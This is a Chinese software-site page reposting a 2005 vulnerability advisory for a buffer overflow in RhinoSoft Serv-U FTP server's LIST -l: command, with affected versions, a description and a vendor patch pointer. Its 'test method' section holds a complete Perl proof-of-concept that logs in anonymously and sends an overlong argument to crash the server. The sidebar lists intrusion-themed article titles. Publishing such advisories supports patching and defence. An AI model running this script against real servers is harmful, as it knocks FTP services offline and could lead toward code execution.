VB 源码VC 源码ASP源码JSP源码PHP源码CGI源码FLASH源码素材模板C 源程序常用软件文档中心其他程序

网络安全

木马病毒
黑客技术
系统安全
防火墙
安全防范
网络安全

本类阅读TOP10
·网吧入侵和网吧老板斗争到底
·远程破OICQ密码给工具QQExplorer ver 1.25介绍
·最新奇迹私服复制漏洞大全(含98c)
·在家远程控制公司的局域网电脑
·网络入侵入门
·MAC地址与IP地址绑定策略的破解
·入侵系统如何获得第一个帐号
·完全解析 用户ADSL网络账号为何被盗?
·续:IPC$入侵过程(CIS工具介绍)
·私服安全系统安全精华篇

精品推荐
Serv-U FTP服务器LIST命令超长-l参数远程缓冲区溢出漏洞

作者:佚名 来源:月光软件站 加入时间:2005-3-1 月光软件站
受影响系统:
RhinoSoft Serv-U 5.0
RhinoSoft Serv-U 4.1.0.3
RhinoSoft Serv-U 4.1.0.11
RhinoSoft Serv-U 4.0.0.4
RhinoSoft Serv-U 4.0.0.0
RhinoSoft Serv-U 5.0.0.4
    - Microsoft Windows XP
    - Microsoft Windows NT 4.0
    - Microsoft Windows 98
    - Microsoft Windows 2000
不受影响系统:
RhinoSoft Serv-U 5.0.0.9
描述:
--------------------------------------------------------------------------------
Serv-U是一个Windows平台下使用非常广泛的FTP服务器软件。

Serv-U在处理LIST命令对参数处理不正确,远程攻击者可以利用这个漏洞对FTP服务程序进行拒绝服务攻击,存在执行任意指令的可能。

攻击者利用LIST -l:命令,提交超长字符串给SERV-U,可触发缓冲区溢出,导致服务程序崩溃,精心构建提交数据可能以进程权限执行任意指令。

<*来源:storm (storm@stormdev.net)
  
  链接:http://www.securiteam.com/windowsntfocus/5ZP0G2KCKA.html
*>

测试方法:
--------------------------------------------------------------------------------
storm (storm@stormdev.net)提供了如下测试方法:

#!/usr/bin/perl

use IO::Socket;

$host = "192.168.1.243";

$remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2116",
    );

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
print $_;
if (/220 /)
{
  last;
}
}

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/331 /)
{
  last;
}
}

$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/230 /)
{
  last;
}
}

my $ftp = join ("", "LIST -l:", "A"x(134), "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/250 Done/)
{
  last;
}
}

close $remote;

建议:
--------------------------------------------------------------------------------
厂商补丁:

RhinoSoft
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.serv-u.com/

相关文章
  • 通过探测邮件服务器进行Email地址有效性检验
  • ASP.NET通过DSO访问分析服务器的权限问题
  • 黑客越来越多 如何设定安全log服务器呢?
  • 代理服务器软件冲突导致的网络故障分析
  • 使用网络地址转换实现多服务器负载均衡
  • 代理服务器使用祥解
  • 服务器版Longhorn把Unix逼入死境
  • 精确对时:增加Internet时间服务器
  • Linux下的代理服务器设置
  • 组网不求人!搭建简易Linux局网服务器
  • Win2000服务器轻松管
  • 插翅难逃 根据Web服务器的记录来追踪黑客
  • 插翅难逃 根据Web服务器的记录来追踪黑客
  • 第一章 熟悉JSP服务器
  • 如何让你的服务器支持asp.net
  • 提高IIS 5.0网站服务器的执行效率的八种方法
  • 提高IIS 5.0网站服务器的执行效率的八种方法
  • Web服务器安全指南
  • 169proxy服务器设置大全
  • 上网服务器步步建

    • 相关软件

  • 类似WinGate的代理服务器源程序  
  • 简单的虚拟代理服务器的源程序  
  • TelNet服务器的源程序  
  • 用TCP/IP服务器客户端通讯源代码  
  • 用TCP/IP实现客户/服务器模式  
  • NT服务器的App Wizard  
  • 该聊天程序包括服务器和客户端两部分  
  • 这是一个代理服务器程序它使用多线程  
  • MSDN中的HTTP服务器程序非常具有参  
  • 多线程实现客户-服务器结构的一个例子  
    		•



    月光软件程序下载编程文档电脑教程网站设计网址导航网络文学游戏天地幽默笑话生活休闲写作范文安妮宝贝
    电脑技术编程开发网络专区谈天说地情感世界游戏元素分类游戏热门游戏体育运动手机专区业余爱好影视沙龙
    音乐天地数码广场教育园地科学大观古今纵横谈股论金人文艺术医学保健动漫图酷二手专区地方风情各行各业

    月光软件站·版权所有